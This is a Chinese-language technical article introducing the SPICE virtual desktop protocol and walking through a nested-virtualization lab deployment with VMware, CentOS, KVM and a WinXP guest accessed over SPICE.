SPICE(Simple Protocol for independent Computing Environment,独立计算环境的简单协议)是基于虚拟云桌面的一种虚拟化框架,也是一个桌面服务展示协议,与RDP(Remote Desktop Protocol,远程桌面协议)和VNC(Virtual Network Console,虚拟网络控制台)类似。通过SPICE我们可以像使用本地计算机一样访问远程PC,这样可以将需要进行高强度和长时间计算的工作移交给数据中心服务器,有效的提高运行效率,降低企业开支,用户身边只要有可以上网的设备就可以方便的与远程虚拟桌面进行交互,并且整个方案是开源构架的。

2.2 协议组件

作为REDHAT公司重要的虚拟化桌面组件之一,SPICE具有很强的自适应能力,能够让用户获得与真实PC相同的体验,它主要包含以下3个组件:

SPICE Driver(SPICE驱动器):每个虚拟桌面都具备的基础组件。

SPICE Device(SPICE设备):REDHAT企业虚拟化Hypervisor设备内存在的组件。

SPICE Client(SPICE客户端):终端组件,终端可以是个人电脑、平板电脑、瘦客户端甚至是ipad等设备,用于接入虚拟桌面。

这三个组件相互协作运行,以既能提高用户体验又能降低系统资源消耗的方式提供最优质的虚拟桌面效果。如果客户端足够强大,SPICE可以向客户端发送图形命令,并在客舳硕酝夹谓行处理,这将显著减轻服务器的资源消耗。如果客户机不够强大,SPICE在服务器端处理图形,从CPU的角度来说,图形处理并不需要消耗很多资源。

2.3 协议优势

目前虚拟云桌面协议主要有RDP、VNC与SPICE,通过对三者间的对比我们可以发现,SPICE相比其他两种协议在许多参数都占有较大的优势,对比表格如下所示: 3 基于SPICE的虚拟云桌面解决方案

针对SPICE的技术特点和实际虚拟云桌面的使用需求,我们组建了一种综合虚拟云桌面解决方案,在具体实验环境中由于设备的限制,方案设计采用两次虚拟化的方式实现部署。

3.1 总体规划

考虑到方案的稳定性与可靠性,数据中心的服务器集群通过KVM(Kernel-based Virtual Machine,基于Kernel的虚拟机)进行虚拟化,并部署HA(High Available,高可用性)保证高可用性,在服务端和客户端之间还应该部署LB(load balance,负载均衡)设备保证高并发环境下系统的稳定,解决方案如下图1所示:

3.2 方案具体实施过程

为了验证虚拟云桌面方案的可行性,我们可以搭建一个实验环境进行测试,实验环境至少需要一台主机,并在实验之前需要将设备主板BIOS中的硬件虚拟化功能打开,同时我们还需要可以支持两次虚拟化的软件,所以综上所述我们实验环境至少需要一台CPU性能至少为INTEL I5,内存性能至少为8G的PC,虚拟化软件选择VMWare Workstation12。

实验环境要能反正解决方案中的结果需要经过以下几个步骤:

1) 在确保PC的VMware软件正确安装后,打开软件的虚拟化选项,这是二次虚拟化非常重要的一步。由于我们的实验环境是在虚拟化软件内安装CENTOS操作系统,并在操作系统内再安装一个KVM虚拟化软件,所以这需要我们的第一个虚拟化软件支持两次虚拟化功能。在VMware的虚拟机设置中找到虚拟化Intel VT-x/EPT或AMD-V/RVI选项并勾选。

2) 检查内核,安装KVM和支持的API,最后验证KVM模块。通过这几个步骤我们可以校验KVM是否顺利的安装到了CENTOS系统中,主要执行的代码有以下5条:

3) 在CENTOS操作系统的图形化界面中使用virt-manager在KVM中创建一个新的WINXP操作系统。这个创建过程和在VMware中创建CENTOS操作系统相似,在此就不详细介绍。

4) 对KVM创建好的WINXP操作系统进行设置。主要更改的选项有Display中的Type下拉菜单选择SPICE协议,在Graphics中勾选Listen on all public network interfaces,端口号设置为5900,最后在Video中Model下拉菜单选择qxl。

5) 在CENTOS操作系统中创建一个新的名为bridge的网卡,网卡参数与默认的eth0相类似,在最后添加TYPE=“Bridge”即可,最后使用命令service network restart重新启动CENTOS的网络连接。

6) 在安装了SPICE客户端的PC中通过端口5900,远程上WINXP操作系统。

完成试验后可以通过一系列的系统性能测试软件对虚拟云桌面的系统性能进行测试,这里就不做详细介绍,从测试结果可以发现,这种远程的连接性能与使用本地PC的性能相差无几,可以说做到了真正的云端资源本地化。

4 SPICE的未来

相信随着虚拟化技术的不断创新与完善,基于SPICE的虚拟云桌面技术将越来越好。未来我们可以直接借助对DirectX和API的操作实现一个虚拟视频卡,加快CAD应用和多媒体应用,加快游戏画面的切换并减少闪烁,3D加速性能也将得到很大的提高,在系统兼容性方面将不仅兼容传统的PC与笔记本电脑,还将兼容智能手机及ipad等平板设备,实现真正的随时随地使用云桌面。

参考文献:

[1]朱爱军 云桌面技术在学院公共机房改造中的应用[J].信息通信,2016(3)

相关热门标签